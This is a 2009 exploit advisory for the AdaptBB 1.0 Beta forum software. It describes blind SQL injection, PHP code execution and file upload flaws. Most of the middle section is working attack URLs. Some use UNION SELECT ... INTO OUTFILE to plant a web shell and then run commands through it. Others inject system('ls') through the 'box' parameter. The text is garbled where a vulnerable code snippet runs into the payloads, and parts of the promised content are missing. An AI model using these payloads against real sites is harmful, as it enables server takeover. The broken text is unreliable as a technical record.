******* Salvatore "drosophila" Fresta ******* [+] Application: AdaptBB [+] Version: 1.0 Beta [+] Website: http://sourceforge.net/projects/adaptbb/ [+] Bugs: [A] Multiple Blind SQL Injection [B] Multiple Dynamic Code Execution [C] Arbitrary File Upload [+] Exploitation: Remote [+] Date: 09 Apr 2009 [+] Discovered by: Salvatore "drosophila" Fresta [+] Author: Salvatore "drosophila" Fresta [+] Contact: e-mail: drosophilaxxx@gmail.com ************************************************* [+] Menu 1) Bugs 2) Code 3) Fix ************************************************* [+] Bugs - [A] Multiple Blind SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: almost all of the files are vulnerable This bug allows a guest to execute arbitrary SQL queries. - [B] Multiple Dynamic Code Execution [-] Risk: hight [-] File affected: almost all of the files are vulnerable This bug allows a guest to execute arbitrary php code. ... if ($_GET['box']) { $folder = $_GET['box']; } ... $ddata[] = ucwords($folder); ... eval (" ?> ".str_replace($cdata, $ddata, stripslashes(template($view."_header")))." ',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23 http://site/path/index.php?do=profile&user=blabla&box=-1' UNION ALL SELECT '',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23 http://site/path/index.php?do=messages&user=blabla&box=-1' UNION ALL SELECT '',2,3,4,5,6,7,8 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23 http://site/path/index.php?do=edit_post&id=-1' UNION ALL SELECT '',2,3,4,5,6,7,8,9 INTO OUTFILE '/var/www/htdocs/path/rce.php'%23 To execute commands: http://site/path/rce.php?cmd=uname -a - [B] Multiple Dynamic Code Execution http://www.site.com/path/index.php?do=profile&user=blabla&box="; system('ls'); echo ""?> http://www.site.com/path/index.php?do=messages&user=blabla&box="; system('ls'); echo ""?> ************************************************* [+] Fix To fix them you must check the input properly. However is not recommended to store your real username and password in the cookies. *************************************************